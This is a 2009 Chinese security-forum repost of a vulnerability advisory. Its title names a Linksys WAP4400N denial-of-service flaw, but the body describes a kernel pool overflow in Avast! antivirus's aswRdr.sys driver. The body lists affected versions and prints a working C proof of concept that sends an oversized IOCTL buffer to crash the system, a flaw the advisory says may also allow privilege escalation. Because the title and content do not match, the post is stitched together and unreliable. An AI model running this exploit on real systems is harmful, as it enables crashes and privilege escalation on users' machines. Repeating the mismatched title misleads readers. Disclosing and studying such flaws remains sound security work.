Board logo

标题: Linksys WAP4400N关联请求远程拒绝服务漏洞 [打印本页]

作者: zclzhao    时间: 2009-11-20 14:55     标题: Linksys WAP4400N关联请求远程拒绝服务漏洞

 
影响版本:
Avast! Antivirus Professional Edition 4.8.1356
Avast! Antivirus Professional Edition 4.8.1351
Avast! Antivirus Professional Edition 4.8.1335
Avast! Antivirus Professional Edition 4.8.1169
Avast! Antivirus Professional Edition 4.7.1098
Avast! Antivirus Professional Edition 4.7.1043
Avast! Antivirus Professional Edition 4.7.844
Avast! Antivirus Professional Edition 4.7.827
Avast! Antivirus Professional Edition 4.6.691
Avast! Antivirus Professional Edition 4.6.665
Avast! Antivirus Professional Edition 4.6.652
Avast! Antivirus Professional Edition 4.6.603
Avast! Antivirus Professional Edition 4.6
Avast! Antivirus Professional Edition 4.0
Avast! Antivirus Home Edition 4.8.1356
Avast! Antivirus Home Edition 4.8.1351
Avast! Antivirus Home Edition 4.8.1335
Avast! Antivirus Home Edition 4.8.1169
Avast! Antivirus Home Edition 4.7.1098
Avast! Antivirus Home Edition 4.7.1043
Avast! Antivirus Home Edition 4.7.869
Avast! Antivirus Home Edition 4.7.844
Avast! Antivirus Home Edition 4.7.827
Avast! Antivirus Home Edition 4.6.691
Avast! Antivirus Home Edition 4.6.691
Avast! Antivirus Home Edition 4.6.665
Avast! Antivirus Home Edition 4.6.655
Avast! Antivirus Home Edition 4.6.652
Avast! Antivirus Home Edition 4.6
Avast! Antivirus Home Edition 4.0
漏洞描述:
Bugraq ID: 37031

Avast! Antivirus Professional是一款流行的反病毒应用程序。
Avast's aswRdr.sys没有过滤用户提供的输入IOCTL,这可导致内核触发堆溢出,使系统触发蓝屏,也可能造成特权提升。
<*参考
http://www.securityfocus.com/archive/1/507891
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
+-----------------------------------------------------------------------
----+
/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption
*
* Author(s): Giuseppe 'Evilcry' Bonfa'
* AbdulAziz Hariri
* E-Mail: evilcry _AT_ gmail _DOT_ com
* Website: http://evilcry.netsons.org
* http://evilcodecave.blogspot.com
* http://evilcodecave.wordpress.com
* http://evilfingers.com
*
* Disclosure Timeline: As specified in the Advisory.
*/
#define WIN32_LEAN_AND_MEAN
#include
#include
BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
{
WCHAR DeviceName[MAX_PATH];
HANDLE hDevice;
if ((GetVersion() & 0xFF) >= 5)
{
wcscpy(DeviceName, L"\\\\.\\Global\\");
}
else
{
wcscpy(DeviceName, L"\\\\.\\");
}
wcscat(DeviceName, DriverName);
printf("Opening.. %S\n", DeviceName);
hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0,
NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("CreateFile() ERROR %d\n", GetLastError());
return FALSE;
}
*lphDevice = hDevice;
return TRUE;
}
int main()
{
HANDLE hDev = NULL;
DWORD Junk;
if(!OpenDevice(L"aswRDR",&hDev))
{
printf("Unable to access aswMon");
return(0);
}
char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE |
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (Buff)
{
memset(Buff, 'A', 0x156);
DeviceIoControl(hDev,0x80002024,Buff,0x156,Buff,0x156,&Junk,(LPOVERLAPPE
D)NULL);
printf("DeviceIoControl Executed..\n");
}
else
{
printf("VirtualAlloc() ERROR %d\n", GetLastError());
}
return(0);
}

安全建议:
目前没有详细解决方案提供:




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2